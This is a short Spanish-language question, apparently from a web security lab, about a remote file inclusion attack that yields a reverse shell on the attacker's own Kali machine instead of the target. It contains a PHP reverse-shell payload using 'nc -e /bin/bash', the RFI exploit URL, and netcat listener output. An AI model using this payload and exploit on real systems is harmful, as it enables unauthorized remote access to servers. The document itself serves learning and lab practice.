En un intento por explotar la debilidad de RFI, estoy ejecutando Apache en mi caja Kali para alojar la shell inversa de php y la shell se conectó de nuevo a mi mismo (mi máquina kali).
¿Por qué obtengo una shell de mi máquina Kali en lugar del servidor web de destino?
La shell de php reverse: shell.php
<?php echo shell_exec('nc -e /bin/bash <Kali IP> 4444'); ?>
La explotación de RFI:
http://<Target IP>/vulnerabilities/fi/?page=http://<Kali IP>/shell.php
Cuando corro:
nc -nlvp 4444
connect to [192.168.60.2] from (UNKNOWN) [192.168.60.2] 46654
hostname
kali